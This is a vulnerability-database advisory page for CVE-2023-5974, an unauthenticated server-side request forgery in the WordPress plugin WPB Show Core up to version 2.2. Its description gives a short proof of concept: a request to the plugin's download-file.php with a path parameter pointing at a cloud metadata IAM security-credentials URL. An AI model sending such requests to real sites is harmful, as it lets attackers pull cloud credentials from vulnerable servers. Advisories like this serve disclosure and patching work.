Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitMohamed AbdelhadyWPEX-ID:C0136057-F420-4FE7-A147-ECBEC7E7A9B5
HistoryNov 06, 2023 - 12:00 a.m.

WPB Show Core <= 2.2 - Unauthenticated Server Side Request Forgery

2023-11-0600:00:00
Mohamed Abdelhady
57
vulnerable plugin
unauthenticated
server side request forgery
exploit
arbitrary url

AI Score

9.7

Confidence

High

EPSS

0.001

Percentile

43.4%

JSON

Description This plugin is vulnerable to server-side request forgery (SSRF) via the path parameter.

Send a GET request to `wpb-show-core/download-file.php` with the path parameter set to an arbitrary URL 

`http://example.com/latest/meta-data/iam/security-credentials/wpb-apps-prod-role`

the website will download/response the files

Related

cvelist 1
prion 1
wpvulndb 1
cve 1
nvd 1
cvelist
cvelist
CVE-2023-5974 WPB Show Core <= 2.2 - Unauthenticated Server Side Request Forgery
2023-11-27 16:22:02
prion
prion
Server side request forgery (ssrf)
2023-11-27 17:15:00
wpvulndb
wpvulndb
WPB Show Core <= 2.2 - Unauthenticated Server Side Request Forgery
2023-11-06 00:00:00
cve
cve
CVE-2023-5974
2023-11-27 17:15:09
nvd
nvd
CVE-2023-5974
2023-11-27 17:15:09

AI Score

9.7

Confidence

High

EPSS

0.001

Percentile

43.4%

JSON
Related for WPEX-ID:C0136057-F420-4FE7-A147-ECBEC7E7A9B5
cvelist1prion1wpvulndb1cve1nvd1